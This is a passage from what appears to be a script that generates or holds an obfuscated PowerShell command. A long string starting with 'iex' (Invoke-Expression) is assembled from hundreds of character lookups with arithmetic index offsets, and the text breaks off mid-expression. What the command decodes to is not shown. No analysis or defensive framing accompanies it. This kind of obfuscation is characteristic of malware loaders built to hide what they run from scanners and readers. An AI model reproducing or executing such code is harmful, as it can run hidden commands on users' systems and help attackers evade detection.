'i': i, 'j': j, 'k': k, 'l': l, 'm': m, 'n': n, 'o': o, 'p': p,
'q': q, 'r': r, 't': t, 'u': u
}
obfuscated_string = """iex ((h[42 - 30 - 62 + 32 - 98 + 127],t[58 - 82 - 11 + 96 - 46 + 73],a[- 34 - 18 - 90 + 13 - 25 + 174],i[- 47 + 66 + 62 + 99 - 62 - 39],f[31 + 18 + 16 - 24 + 12 - 19],g[- 32 + 20 + 30 - 38 - 51 + 102],q[- 92 - 65 + 24 + 87 + 52 + 91],g[- 15 + 59 - 86 + 59 + 58 - 65],n[82 + 33 + 67 - 31 - 20 - 81],c[26 + 98 + 46 + 18 - 21 - 122],j[21 + 11 + 50 - 36 + 39 - 85],c[- 76 - 35 + 75 + 98 - 21 - 22],g[58 - 66 + 22 + 91 + 92 - 178],q[- 48 + 43 + 88 - 70 - 48 + 107],b[- 99 + 84 - 35 + 97 + 78 - 96],d[48 - 27 + 68 + 37 - 96 + 36],d[- 17 + 51 + 35 + 29 - 92 + 91],u[- 88 + 29 + 36 + 14 + 78 + 26],c[- 85 - 65 - 31 + 47 - 60 + 213],c[- 98 + 17 + 67 - 47 - 56 + 204],j[59 + 47 + 37 - 21 + 14 - 115],c[- 84 + 20 + 29 - 62 - 70 + 176],d[- 30 - 97 - 80 - 92 + 22 + 348],k[64 + 63 - 78 - 76 + 55 + 47],p[- 63 - 99 - 87 - 97 - 33 + 443],a[46 - 82 + 28 + 67 + 44 - 82],a[26 - 51 + 81 + 96 - 49 - 32],t[57 - 63 + 77 + 57 - 78 - 19],c[11 + 91 + 63 - 81 - 93 + 25],n[88 + 66 + 92 + 23 - 93 - 95],u[34 - 25 - 55 - 73 + 42 + 111],l[40 - 45 - 75 + 33 - 27 + 154],h[- 70 + 36 - 46 - 71 - 49 + 201],t[44 - 14 - 78 - 25 - 40 + 205],t[- 97 - 75 + 18 + 54 - 71 + 186],b[- 51 - 45 + 36 + 47 - 54 + 96],a[- 63 + 20 - 78 + 36 - 77 + 241],f[- 20 + 74 + 12 + 54 - 13 - 9],g[- 70 - 18 + 81 + 88 - 16 + 14],f[25 + 22 + 42 + 13 - 44 - 9],m[- 47 + 53 + 31 - 33 - 93 + 164],m[36 - 14 + 67 - 79 + 20 + 23],c[- 10 - 78 + 48 + 96 + 56 - 32],m[26 - 73 - 20 + 62 + 92 - 23],i[- 94 - 26 - 23 - 62 - 15 + 312],r[- 65 + 98 + 93 + 93 + 10 - 192],m[25 + 32 + 40 - 65 - 23 + 1],d[62 + 63 - 14 + 90 - 58 - 107],j[77 + 59 + 67 + 46 - 46 - 112],t[- 44 + 15 - 26 - 13 + 55 + 64],a[- 81 - 64 + 47 - 68 + 69 + 195],d[- 94 - 23 - 75 - 99 + 90 + 298],i[- 28 + 71 + 27 + 79 + 37 - 130],g[- 17 - 86 - 77 - 51 - 33 + 360],t[- 76 + 54 - 19 + 51 - 57 + 125],a[- 75 + 25 - 79 + 48 - 59 + 151],j[81 + 46 - 61 - 88 + 75 + 8],c[32 + 13 - 31 - 30 + 78 - 58],l[82 + 92 - 99 + 19 + 48 - 57],i[- 83 + 43 - 30 + 27 + 65 - 20],u[- 71 + 27 + 59 + 27 - 54 + 87],b[93 - 68 + 61 + 90 + 16 - 124],j[- 38 + 33 + 15 - 58 + 79 + 48],n[- 96 - 32 - 84 - 52 - 95 + 440],j[- 24 - 55 - 38 + 70 - 59 + 116],b[- 36 - 38 - 31 + 71 - 27 + 76],b[- 51 + 97 + 16 + 50 + 55 - 143],c[- 17 - 78 + 61 - 20 + 18 + 66],a[- 21 + 34 - 71 + 38 - 75 + 167],n[39 - 92 - 14 - 61 + 77 + 134],f[- 63 - 81 + 30 + 55 - 72 + 170],o[53 - 57 - 19 - 21 - 31 + 79],l[- 83 - 39 - 44 - 58 - 28 + 304],e[30 + 16 - 93 + 39 + 56 - 45],a[- 43 - 38 + 37 - 57 - 32 + 155],f[- 40 - 19 - 36 + 46 - 75 + 203],e[- 10 - 29 - 27 - 11 + 70 + 74],n[- 53 + 54 + 31 - 55 - 12 + 41],u[36 + 51 - 77 - 55 + 50 + 3],u[22 - 65 + 36 - 17 + 45 + 70],f[72 - 89 + 30 + 32 + 12 - 57],m[57 + 27 + 89 - 40 - 29 - 65],u[17 - 31 - 38 - 54 + 38 + 91],j[- 31 + 12 + 37 + 63 - 91 + 16],b[- 75 - 33 + 61 - 67 - 17 + 174],b[59 - 89 + 67 - 93 + 46 + 43],j[71 - 52 + 47 - 15 - 98 + 125],q[91 - 20 + 50 + 10 - 46 - 69],j[- 48 - 77 - 48 - 75 + 33 + 238],j[- 11 + 79 + 32 + 88 + 80 - 212],t[71 - 49 + 46 + 61 + 29 - 92],n[21 - 77 + 59 - 69 - 86 + 223],k[- 78 - 30 + 44 - 42 + 47 + 152],j[- 66 + 93 + 34 + 92 + 64 - 212],h[- 75 - 87 - 44 - 68 + 74 + 244],t[- 67 + 98 + 72 + 31 - 27 - 84],j[51 - 79 - 93 + 41 - 85 + 182],g[- 97 - 21 - 16 + 84 - 21 + 157],q[99 - 18 - 40 + 20 + 94 - 126],t[56 - 53 + 24 + 60 - 39 - 10],g[20 - 83 - 76 + 53 - 34 + 183],k[42 - 29 + 71 - 24 + 78 - 107],b[- 46 - 40 + 20 - 36 - 12 + 127],j[- 22 - 43 - 31 + 20 + 45 + 36],f[99 + 51 - 89 - 77 - 24 + 118],m[92 + 74 - 46 + 98 - 71 - 129],j[- 16 + 49 - 75 + 77 - 64 + 118],k[79 - 42 + 73 + 86 - 60 - 67],t[52 - 92 + 99 - 83 + 62 + 20],l[- 96 - 23 - 11 - 67 - 76 + 367],e[27 - 30 - 10 + 50 + 17 + 33],m[17 + 21 + 79 - 16 - 74 + 69],c[61 + 80 + 28 + 54 + 91 - 221],m[58 - 13 - 70 - 61 + 38 + 49],p[42 + 90 - 39 - 59 + 67 - 23],i[- 75 - 39 + 25 - 84 + 97 + 144],u[- 94 + 58 - 58 + 14 - 58 + 187],e[81 + 60 + 63 + 12 + 30 - 180],l[- 10 - 53 - 18 + 14 + 12 + 93],t[71 - 44 - 19 + 57 - 10 + 32],h[19 + 53 - 97 + 56 + 56 - 63],n[- 57 + 71 + 92 + 50 + 36 - 168],a[- 89 - 29 - 76 + 45 + 67 + 179],e[- 52 - 58 - 88 - 53 + 72 + 257],l[37 + 37 + 49 - 29 + 64 - 127],f[97 - 51 - 85 - 81 - 64 + 266],t[- 29 + 28 - 99 + 80 + 28 - 1],j[- 92 - 87 + 55 + 21 + 48 + 102],d[29 + 49 + 79 - 98 - 30 + 68],d[- 61 + 48 - 68 - 66 - 90 + 330],h[- 86 + 69 - 83 + 48 - 34 + 141],o[- 10 - 30 - 25 - 86 + 58 + 159],b[- 83 - 35 - 16 - 88 - 47 + 330],h[81 - 71 - 41 + 62 - 20 + 23],f[- 52 - 75 - 62 - 47 - 61 + 336],l[- 20 + 73 - 26 - 72 + 51 + 4],g[14 - 87 + 56 - 79 - 12 + 139],o[24 + 75 - 60 + 99 + 40 - 146],f[- 28 - 33 - 66 - 31 - 94 + 329],o[- 19 + 92 + 32 + 84 + 64 - 197],f[- 66 + 38 - 31 - 10 - 56 + 194],i[- 13 + 12 - 87 + 72 - 74 + 129],t[- 17 - 77 + 54 - 55 - 27 + 186],m[- 12 + 47 - 96 - 52 + 39 + 86],t[- 15 + 17 + 75 + 33 + 38 - 130],l[- 51 - 91 + 45 + 81 - 17 + 80],o[87 + 51 + 46 + 27 + 39 - 219],b[89 - 99 + 30 - 53 + 19 + 63],f[71 - 81 - 25 + 86 + 84 - 111],l[87 - 20 - 75 - 16 + 23 + 93],o[69 + 96 - 16 + 34 - 67 - 74],k[- 60 - 99 - 17 + 76 - 46 + 192],n[83 + 50 - 68 - 71 - 16 + 90],n[- 52 - 15 - 51 + 15 + 50 + 79],o[- 39 - 25 + 88 + 12 + 92 - 69],a[87 + 96 - 46 + 94 - 57 - 117],o[- 52 - 25 + 19 - 98 - 66 + 259],a[- 15 + 45 + 24 - 24 - 57 + 98],a[63 - 22 + 80 + 24 - 12 - 129],g[- 16 + 89 + 56 + 80 - 49 - 156],m[73 + 77 - 57 - 20 - 57 + 7],u[54 + 53 + 26 - 89 - 60 + 50],b[21 - 59 - 24 - 52 + 96 + 51],e[- 31 + 70 - 59 + 48 - 15 + 17],i[84 - 86 + 34 - 61 + 40 + 9],d[- 87 - 79 + 60 - 85 + 20 + 263],g[- 65 + 25 + 89 - 61 - 60 + 168],b[- 69 + 48 + 25 + 69 - 64 + 31],f[- 99 + 97 + 72 - 22 - 53 + 103],g[- 29 - 78 - 40 - 21 + 61 + 186],a[- 70 + 37 + 20 - 42 + 45 + 82],m[15 + 39 + 53 - 66 + 27 - 17],p[75 - 44 - 88 + 33 + 76 - 33],j[- 18 - 57 - 55 - 49 - 97 + 279],i[20 - 92 + 35 + 71 + 96 - 91],h[79 + 99 + 28 - 83 + 50 - 108],o[- 57 + 11 - 96 - 74 - 75 + 309],q[62 + 76 + 98 - 17 - 77 - 99],d[10 + 41 - 36 - 35 - 59 + 176],i[32 + 77 + 53 + 61 + 89 - 233],n[58 - 35 - 94 + 15 - 56 + 147],e[- 45 - 17 + 32 - 64 - 75 + 196],b[18 - 65 + 43 + 54 + 49 - 76],d[- 38 + 38 - 65 + 38 + 62 - 27],i[- 36 - 94 + 29 + 49 - 68 + 218],q[77 + 54 - 49 + 36 - 57 - 34],g[- 75 + 45 + 84 - 42 - 18 + 65],m[- 33 - 41 + 50 + 31 + 30 - 20],c[- 89 + 63 - 80 - 41 - 76 + 299],c[- 31 + 75 - 92 - 79 - 18 + 183],i[- 70 + 32 + 39 - 40 - 68 + 188],l[- 54 + 33 + 50 + 38 - 84 + 77],u[66 + 20 - 44 + 13 - 75 + 27],d[- 28 + 50 - 79 - 86 + 25 + 140],o[- 10 + 42 + 75 + 39 - 91 - 23],j[53 + 30 + 78 - 12 + 45 - 102],t[- 61 + 51 - 21 - 86 + 98 + 64],u[- 42 + 96 + 91 + 48 + 25 - 193],p[57 - 53 + 52 + 98 + 99 - 238],u[10 - 30 - 61 + 30 - 88 + 182],o[- 32 - 66 - 70 - 50 - 45 + 334],r[- 69 - 38 + 11 - 92 + 32 + 225],p[- 44 - 94 - 21 + 31 - 25 + 172],j[- 74 - 49 + 60 + 41 - 66 + 134],n[- 61 + 87 + 51 - 65 - 90 + 99],o[- 49 - 39 - 55 + 68 + 11 + 82],t[31 + 25 + 81 - 48 + 90 - 173],k[37 + 28 - 48 - 66 - 30 + 83],t[79 + 57 - 42 + 40 - 20 - 103],c[- 42 + 97 - 29 + 26 + 27 - 66],l[- 66 + 19 - 40 - 50 - 32 + 249],l[31 + 18 - 62 + 24 + 17 + 14],h[92 + 35 + 13 - 73 + 18 - 61],o[61 - 65 - 14 - 31 + 41 + 31],e[34 - 18 - 58 + 51 + 78 - 78],q[- 78 - 88 + 12 - 57 + 25 + 220],t[64 + 58 + 65 + 78 - 43 - 147],t[- 59 + 47 - 26 - 93 - 57 + 280],f[- 55 + 63 - 19 + 95 + 50 - 56],r[82 - 89 - 31 - 40 + 37 + 124],k[- 73 + 87 - 88 + 48 - 52 + 124],t[79 + 27 - 33 + 67 - 97 - 19],c[18 + 37 - 58 + 86 - 17 - 30],q[19 - 78 + 96 - 87 + 37 + 52],p[- 85 - 97 - 42 + 18 + 47 + 175],h[- 29 + 77 + 91 + 88 + 63 - 205],m[- 26 + 42 + 86 + 14 + 64 - 116],j[- 71 - 99 - 12 + 26 - 28 + 185],f[- 54 - 32 - 96 - 96 - 60 + 414],k[78 + 29 + 16 - 48 + 49 - 26],l[- 93 + 65 + 38 - 64 + 37 + 25],u[23 + 44 + 89 + 85 - 88 - 134],g[84 + 62 + 63 - 44 + 13 - 90],f[88 + 72 - 82 + 67 - 95 + 32],p[96 - 81 - 19 + 49 - 99 + 60],f[99 - 59 + 88 + 26 + 46 - 117],m[48 - 34 - 46 - 84 + 10 + 118],n[35 - 88 + 88 + 22 - 61 + 91],o[52 + 12 - 42 + 60 - 71 + 41],j[34 - 89 + 54 - 67 - 70 + 181],q[48 + 59 + 15 + 42 - 64 - 83],e[45 - 94 - 54 - 97 + 52 + 201],q[- 56 - 44 - 94 - 41 - 99 + 431],a[82 + 73 - 76 - 13 - 21 - 35],p[- 54 - 87 - 21 - 52 - 91 + 314],b[70 + 37 + 54 + 92 - 53 - 121],u[- 64 + 41 - 33 - 28 - 96 + 215],t[- 61 - 17 - 62 - 85 - 59 + 348],k[49 + 61 - 81 + 68 - 57 + 30],c[- 46 - 39 + 75 + 97 + 34 - 54],b[61 - 89 - 49 + 53 - 11 + 113],f[- 15 + 22 + 63 - 91 - 84 + 115],u[- 35 - 54 + 31 - 85 - 30 + 205],t[67 + 24 - 76 + 79 - 55 + 45],i[- 49 + 15 + 14 + 75 + 48 - 50],q[- 65 + 48 + 31 + 63 - 99 + 66],h[27 - 50 + 30 + 66 + 88 - 93],a[- 93 + 23 - 16 - 33 - 98 + 313],h[91 - 33 - 96 - 89 - 83 + 308],m[- 74 - 83 + 64 + 81 - 22 + 104],d[55 - 72 + 36 + 80 - 14 - 79],e[- 54 + 31 + 64 - 73 - 67 + 196],k[- 90 - 99 - 75 + 11 - 61 + 367],i[- 11 + 62 + 96 + 69 - 27 - 131],d[- 90 + 19 + 15 + 46 - 46 + 126],p[- 86 + 50 - 89 + 64 - 71 + 210],m[68 - 30 - 35 + 63 + 77 - 113],q[- 18 - 26 + 11 + 93 - 49 + 53],n[- 11 - 69 - 40 + 88 - 54 + 173],q[65 + 97 - 23 - 94 - 98 + 84],d[61 - 58 + 77 - 47 - 84 + 122],n[- 57 - 70 - 50 + 44 + 33 + 193],f[70 + 40 - 36 + 29 + 37 - 108],q[64 + 70 - 78 + 10 - 61 + 52],m[74 + 77 - 88 - 32 - 76 + 139],d[- 20 + 52 + 25 + 19 - 82 + 20],n[- 32 - 79 - 75 + 13 + 54 + 161],i[- 64 - 80 + 51 + 62 + 19 + 12],l[60 + 63 - 39 + 31 - 36 - 10],o[25 - 54 + 68 - 11 + 50 - 23],b[96 - 54 + 48 - 72 - 46 + 86],n[70 + 40 - 98 - 67 + 24 + 109],b[- 72 + 81 - 26 + 32 - 86 + 147],r[43 - 47 - 35 - 84 + 91 + 35],u[- 39 - 69 - 49 + 97 + 88 - 28],p[61 + 39 - 95 + 24 - 46 + 27],r[44 - 87 - 62 + 42 - 52 + 136],b[- 49 + 40 - 83 - 55 + 24 + 124],t[34 + 75 + 29 + 29 - 34 - 38],n[- 35 - 51 - 22 + 19 - 61 + 213],m[- 19 - 27 - 22 + 46 - 87 + 130],o[- 20 - 33 - 50 + 46 + 49 + 22],n[- 30 - 53 + 43 + 56 - 55 + 67],r[85 + 28 + 75 + 60 - 78 - 107],d[47 + 63 + 26 + 49 + 50 - 143],k[40 + 30 + 23 + 65 - 20 - 76],u[- 14 - 50 + 99 + 91 + 58 - 123],j[- 94 - 61 + 14 - 67 - 89 + 363],k[- 92 - 88 - 61 + 32 - 80 + 332],o[- 35 + 22 - 63 - 80 + 74 + 147],n[33 - 38 + 51 + 70 + 73 - 111],q[38 + 26 + 46 + 20 + 52 - 114],c[- 19 + 51 + 34 + 95 + 71 - 155],k[- 46 + 67 + 69 + 15 + 47 - 53],o[- 20 + 64 - 53 - 86 + 98 + 9],m[- 86 + 15 + 92 + 19 - 83 + 85],g[33 + 18 + 98 - 29 + 85 - 165],h[38 + 89 + 24 - 44 + 95 - 149],t[16 - 40 + 26 + 94 + 91 - 104],b[96 - 25 + 55 - 26 + 74 - 131],i[43 + 78 + 47 + 88 + 27 - 208],u[92 - 96 + 96 + 58 - 85 - 46],n[98 + 46 - 30 + 19 - 64 - 48],m[36 + 92 + 72 + 18 - 61 - 101],j[- 59 + 63 - 41 + 31 + 42 + 46],k[- 23 + 74 - 28 - 62 - 72 + 147],d[48 - 92 - 23 - 31 + 79 + 116],b[- 78 + 80 - 65 - 86 + 68 + 142],b[- 20 - 97 + 53 + 96 + 85 - 59],o[- 13 - 40 - 32 - 19 - 94 + 217],g[- 72 + 55 + 56 + 28 - 37 + 39],d[51 + 91 - 91 - 16 - 43 + 11],c[39 - 78 + 51 - 79 - 57 + 217],h[- 22 - 13 + 62 - 89 - 66 + 174],f[39 - 45 + 88 + 87 - 20 - 71],d[39 + 25 + 26 - 21 + 49 - 48],i[- 53 + 18 - 86 - 89 - 91 + 376],k[99 - 67 - 66 + 45 - 78 + 163],o[- 67 - 56 + 11 - 96 + 82 + 158],n[- 78 - 66 - 90 + 99 - 43 + 244],q[- 89 - 17 + 33 - 75 + 35 + 212],q[96 + 62 - 76 + 16 - 82 + 71],j[- 67 + 16 + 83 + 40 + 85 - 107],f[- 47 + 84 + 40 + 41 + 74 - 165],k[- 74 + 83 - 29 + 70 - 94 + 102],j[47 - 79 - 41 + 30 + 50 + 1],g[99 + 23 + 92 + 66 - 70 - 159],c[75 - 75 - 27 - 50 + 78 + 75],n[- 73 + 98 + 19 + 43 - 87 + 57],m[36 + 23 + 64 + 27 - 45 - 41],o[25 - 66 - 61 - 21 + 39 + 85],m[- 71 - 28 + 32 - 45 - 32 + 214],k[59 + 83 - 47 - 71 + 96 - 22],g[- 54 - 48 + 91 - 76 + 28 + 110],k[61 + 50 - 91 - 70 + 42 + 61],e[- 16 + 61 + 75 - 88 + 18 - 40],l[10 + 78 + 53 - 81 - 14 - 32],i[- 13 - 95 + 95 + 67 + 78 - 112],e[- 75 + 50 + 26 + 71 - 86 + 37],j[83 + 14 + 29 + 39 + 55 - 219],i[35 + 97 - 54 + 96 - 23 - 76],n[- 45 + 19 + 29 + 37 - 39 + 20],c[- 73 + 36 + 32 - 36 + 95 + 14],l[- 45 + 64 - 83 + 38 - 22 + 127],i[- 21 - 29 - 56 - 62 - 79 + 322],q[- 72 + 79 + 96 - 60 - 95 + 98],h[17 - 82 - 41 - 82 - 70 + 295],a[- 28 - 26 - 27 + 65 + 68 + 16],n[- 35 + 33 + 71 + 89 - 95 - 44],o[50 - 67 + 24 + 20 - 21 - 2],k[76 + 41 + 18 - 69 + 36 - 44],c[80 + 11 - 75 + 58 - 56 + 50],h[- 68 - 55 - 46 - 20 - 84 + 297],m[- 82 + 98 - 29 - 33 + 80 + 19],i[- 10 - 70 - 80 + 91 - 54 + 125],q[- 13 - 19 + 25 - 95 + 24 + 95],n[- 14 - 95 - 40 + 81 - 14 + 98],p[- 41 + 37 - 89 - 64 + 84 + 98],r[- 91 - 59 + 87 - 37 - 27 + 216],d[64 - 71 + 84 + 68 - 45 - 30],j[43 + 14 - 40 + 43 - 34 + 29],l[78 - 21 + 32 - 79 - 75 + 95],a[88 + 67 - 53 + 13 + 92 - 136],r[- 74 - 62 - 72 + 54 + 67 + 97],j[- 64 + 26 + 58 + 88 + 68 - 174],o[- 65 - 37 - 81 - 36 - 87 + 343],a[13 - 91 + 64 + 97 + 72 - 60],n[- 27 - 96 - 83 + 69 + 18 + 147],p[77 + 83 + 67 - 64 + 75 - 223],k[30 + 42 - 16 - 20 + 77 - 43],e[- 60 + 77 - 30 + 20 + 29 + 29],a[13 - 17 - 20 + 95 + 68 - 103],k[- 39 + 86 + 17 - 27 - 54 + 80],l[59 - 55 - 90 - 66 + 69 + 113],p[31 + 99 + 62 - 51 + 75 - 201],i[29 + 47 + 97 + 39 - 39 - 93],u[- 19 - 79 + 93 + 48 - 34 + 16],k[11 - 54 - 41 + 10 + 65 + 13],o[97 + 83 - 75 - 80 + 61 - 2],a[- 58 + 82 + 31 - 81 - 51 + 97],t[71 - 92 - 29 - 75 + 45 + 171],g[61 + 46 - 77 - 41 - 92 + 184],u[14 + 56 - 19 + 29 - 94 + 112],t[62 - 67 + 68 + 93 - 34 - 77],a[- 69 + 21 - 36 - 21 - 33 + 206],j[- 61 - 35 - 71 - 19 + 18 + 171],d[91 - 61 - 66 + 27 - 84 + 104],t[- 19 - 89 - 95 + 25 - 48 + 247],p[98 - 50 + 26 + 59 - 46 - 28],n[95 - 43 - 42 + 86 + 53 - 128],i[70 + 94 + 67 - 58 + 30 - 146],j[- 81 + 61 + 94 + 49 + 21 - 136],a[63 + 78 + 54 + 63 - 36 - 130],n[- 31 - 93 - 23 + 10 + 36 + 107],p[- 64 - 17 - 71 + 41 - 62 + 219],d[- 65 + 77 + 70 - 59 - 58 + 132],p[45 + 21 + 74 + 27 - 16 - 142],h[- 91 - 38 - 51 - 83 + 81 + 224],j[- 15 - 16 - 18 - 88 + 65 + 133],a[- 71 + 11 - 55 - 94 - 97 + 321],r[- 41 - 44 - 22 - 44 - 36 + 215],a[45 - 58 + 33 - 54 + 18 + 108],f[- 11 - 17 - 88 - 34 + 34 + 146],h[- 50 + 97 - 17 + 81 + 38 - 95],e[- 99 - 20 - 91 + 77 - 17 + 237],j[- 29 - 13 - 56 - 98 + 30 + 166],c[- 16 + 59 + 54 + 10 + 83 - 105],e[31 - 58 + 34 - 87 + 23 + 67],f[- 46 + 49 - 56 - 79 - 55 + 283],k[- 27 + 34 + 15 + 54 - 76 + 19],j[- 11 - 17 + 72 - 96 - 62 + 196],o[44 - 45 - 84 + 57 + 30 + 30],c[62 + 76 - 17 - 21 + 24 - 26],a[80 - 64 - 87 - 47 - 89 + 222],j[80 + 44 + 18 - 52 + 58 - 98],j[78 + 92 + 70 + 23 + 90 - 342],i[65 + 14 + 37 - 72 + 46 - 11],t[56 + 32 - 31 - 76 - 94 + 137],t[- 70 - 34 - 83 + 14 - 48 + 265],p[12 + 10 - 46 + 51 - 15 + 83],r[11 - 48 - 46 - 25 + 92 + 26],q[93 + 93 + 33 - 60 + 70 - 132],h[- 82 - 45 - 68 + 12 + 52 + 192],c[- 72 - 62 - 12 + 35 + 95 + 114],k[- 15 - 36 - 45 - 53 + 38 + 169],f[80 + 12 + 83 - 89 - 31 - 21],q[- 11 + 13 - 14 + 68 - 30 + 71],a[- 82 - 14 + 49 + 91 - 36 + 7],t[77 - 65 + 88 + 28 - 97 - 24],d[49 + 36 + 40 - 92 + 84 - 80],e[- 12 - 48 + 26 - 34 - 38 + 192],k[- 52 + 10 - 98 + 85 + 76 + 49],q[71 + 81 - 96 + 91 + 23 - 130],k[- 22 + 21 + 62 - 21 + 82 - 64],i[- 59 + 26 - 67 - 60 - 13 + 194],t[- 62 + 92 + 92 + 35 - 65 - 68],c[95 - 60 + 24 + 90 + 74 - 189],g[- 90 + 22 - 23 - 14 + 68 + 91],q[- 59 - 45 - 44 - 77 - 69 + 330],r[59 + 27 - 73 - 20 + 76 - 10],o[- 77 + 60 + 97 + 71 - 66 - 81],j[- 43 + 52 + 61 + 27 - 44 - 12],k[- 89 - 35 + 80 + 23 + 57 - 21],h[78 + 81 - 61 + 93 + 21 - 175],q[35 + 22 + 83 + 16 - 32 - 70],l[70 - 44 - 65 + 18 - 94 + 151],t[- 70 - 32 + 49 - 83 - 47 + 224],c[55 + 35 - 60 - 84 + 67 + 25],b[- 16 - 37 - 55 - 74 - 57 + 335],d[- 51 - 20 - 37 + 24 + 45 + 136],q[- 72 - 29 + 65 - 46 + 54 + 63],a[- 63 - 39 - 51 + 91 + 78 - 1],l[40 + 27 - 50 + 67 - 37 - 37],n[- 73 + 78 + 31 + 89 + 75 - 179],g[66 - 83 + 11 - 75 - 31 + 115],r[- 74 - 51 - 81 + 28 + 72 + 116],f[80 + 17 - 39 + 62 - 58 - 28],d[48 + 21 - 97 - 72 + 63 + 102],j[- 92 - 81 + 62 + 33 + 29 + 131],o[66 - 84 - 22 + 17 - 18 + 59],e[- 40 + 39 + 88 - 26 - 42 + 21],f[81 + 74 - 85 + 83 + 84 - 168],m[80 - 29 - 45 + 69 + 93 - 93],u[16 + 24 - 91 - 54 + 92 + 90],u[- 20 - 84 + 55 - 42 - 36 + 146],f[- 43 - 25 + 27 + 64 + 86 - 75],j[35 + 71 + 71 + 11 - 73 - 66],q[27 + 28 + 88 + 72 + 70 - 188],p[15 + 60 - 24 - 16 + 89 - 85],f[52 - 43 + 83 + 72 - 98 - 17],f[- 81 + 52 + 73 - 36 + 77 - 16],p[74 + 63 + 31 + 47 + 90 - 282],d[13 + 75 - 10 - 41 - 60 + 93],k[- 30 - 89 - 25 + 54 + 71 + 63],t[34 - 80 - 71 + 24 - 88 + 199],r[20 - 31 + 19 + 48 + 13 - 37],d[13 + 70 - 59 + 57 - 60 - 11],o[22 - 25 - 12 - 19 - 29 + 80],l[- 52 - 24 + 32 - 44 + 41 + 94],k[- 56 - 30 + 36 + 44 - 54 + 75],r[- 20 - 42 - 45 - 66 - 55 + 259],q[19 - 93 + 41 + 53 + 68 - 34],e[- 71 + 40 + 19 - 92 + 22 + 169],a[17 - 55 + 24 + 98 - 17 - 8],f[- 18 - 64 + 74 + 84 + 23 - 89],c[38 + 32 + 20 + 69 - 42 - 104],n[62 - 61 - 85 - 62 - 93 + 319],g[- 53 + 67 + 59 - 41 + 76 - 89],q[- 74 + 92 - 44 - 70 + 84 + 99],t[56 + 20 - 44 - 63 - 28 + 96],j[- 64 + 92 + 54 + 22 + 34 - 113],f[24 - 84 - 48 + 84 + 83 - 9],a[- 97 + 17 + 90 - 73 - 73 + 231],k[- 20 + 80 - 51 - 34 + 21 + 14],b[- 10 - 35 + 92 + 11 + 32 - 69],t[82 - 55 - 55 + 26 - 76 + 142],c[- 22 - 72 + 60 - 40 - 50 + 218],o[- 48 - 19 - 62 - 14 - 61 + 295],m[- 17 + 29 - 16 - 46 + 49 + 50],j[- 16 + 35 + 61 - 64 - 73 + 65],f[- 66 + 94 + 47 + 46 - 81 + 4],j[35 + 66 + 39 - 22 - 32 - 17],j[24 + 72 - 66 - 74 + 82 + 12],g[15 - 15 + 71 + 15 - 36 + 19],f[32 + 33 - 74 - 76 - 24 + 117],g[95 - 20 - 15 - 32 + 47 + 6],l[- 32 + 39 + 69 + 66 - 60 - 72],c[- 52 + 29 - 71 + 58 - 17 + 151],r[99 - 67 + 56 - 86 - 25 + 33],d[- 48 - 77 - 58 - 91 + 51 + 288],j[- 53 + 64 + 82 - 11 + 71 - 71],k[51 - 71 - 99 - 99 + 16 + 260],d[18 + 40 - 15 + 83 + 75 - 136],u[65 + 48 + 20 + 21 - 93 - 54],p[- 16 - 99 - 93 - 95 - 10 + 319],g[76 - 33 - 97 - 99 - 46 + 218],t[66 - 83 - 15 - 67 + 83 + 44],i[- 93 + 64 + 87 + 37 + 66 - 96],c[95 - 37 + 64 + 95 - 36 - 83],u[- 85 - 72 - 96 - 10 - 80 + 413],n[96 + 59 + 99 - 80 + 72 - 225],i[15 - 54 - 44 - 25 - 25 + 170],h[30 - 12 + 49 + 89 - 56 - 32],h[55 + 31 - 27 + 47 - 84 + 6],e[53 + 64 + 92 - 45 - 67 - 20],d[15 + 31 - 17 - 62 - 99 + 229],c[94 - 37 - 67 - 45 + 63 + 4],c[53 + 95 + 71 + 46 + 72 - 321],q[19 + 58 + 20 + 32 - 48 - 3],i[- 78 + 33 + 99 + 85 - 89 + 36],b[- 51 - 17 - 20 - 93 - 77 + 324],m[10 + 40 + 26 + 40 + 11 - 63],e[- 75 - 48 - 19 - 67 - 77 + 373],j[- 41 - 50 + 57 + 90 + 72 - 65],u[- 25 - 57 - 45 - 77 + 19 + 252],a[- 11 + 30 - 49 + 65 - 75 + 117],f[- 76 - 22 - 79 - 22 + 79 + 176],t[- 11 + 83 + 70 + 26 - 53 - 79],k[63 - 19 + 27 + 59 - 43 - 17],p[26 + 91 + 96 + 12 - 83 - 64],m[50 - 21 - 71 - 60 + 56 + 60],j[- 83 + 37 - 81 - 89 + 67 + 190],p[48 + 86 - 49 - 21 - 85 + 106],d[62 - 38 - 44 - 12 + 97 + 32],j[24 - 52 + 98 + 21 - 97 + 67],p[58 - 96 - 65 + 98 - 57 + 80],l[97 + 48 - 46 - 12 - 53 + 58],d[80 + 86 - 66 - 40 - 11 + 38],h[- 79 + 97 + 14 - 96 - 65 + 143],o[- 21 + 75 + 44 + 30 + 49 - 165],b[76 + 13 + 13 - 25 + 81 - 98],h[94 - 40 - 84 + 86 - 31 + 36],p[- 94 + 90 - 13 - 26 + 49 + 3],e[87 - 50 - 74 + 19 + 71 - 43],u[12 + 70 + 77 + 16 + 15 - 183],m[- 88 + 34 + 50 - 51 + 51 + 66],a[98 - 25 - 59 - 62 + 13 + 50],n[- 20 + 43 + 42 + 69 - 61 - 52],h[- 90 - 66 - 13 - 40 + 88 + 174],l[- 90 + 16 + 30 - 49 + 25 + 98],j[- 18 + 96 + 27 - 93 - 69 + 68],f[- 67 + 10 - 10 + 13 + 71 + 17],k[- 45 - 38 + 13 + 72 + 14 + 66],j[- 96 - 15 + 86 - 12 + 23 + 22],e[- 41 - 92 - 61 + 35 - 81 + 263],a[- 94 + 25 - 94 + 83 - 99 + 194],r[- 94 + 80 + 45 + 30 + 78 - 90],m[- 40 + 48 - 95 - 63 + 51 + 161],p[28 - 76 + 88 + 26 - 32 + 41],q[- 31 - 73 - 45 - 26 - 33 + 210],h[- 20 - 91 + 91 - 75 - 66 + 222],p[29 + 15 - 85 + 77 + 30 - 60],q[89 + 42 - 11 - 94 - 82 + 92],o[- 62 - 41 - 63 + 93 + 82 + 23],p[- 68 + 75 + 19 + 18 + 54 - 88],k[73 + 55 - 28 + 69 + 97 - 206],q[- 86 + 44 + 93 - 49 + 18 + 17],f[85 + 34 + 22 - 49 + 83 - 141],g[- 70 - 68 - 89 + 56 - 21 + 232],t[- 55 + 69 - 69 - 46 - 84 + 280],q[30 - 62 - 10 + 72 - 16 + 27],q[- 55 + 92 - 64 - 26 + 24 + 66],l[- 94 + 64 + 41 - 99 - 63 + 236],k[- 87 + 78 - 70 - 42 + 42 + 132],i[71 + 61 + 97 + 34 - 42 - 213],p[51 - 43 - 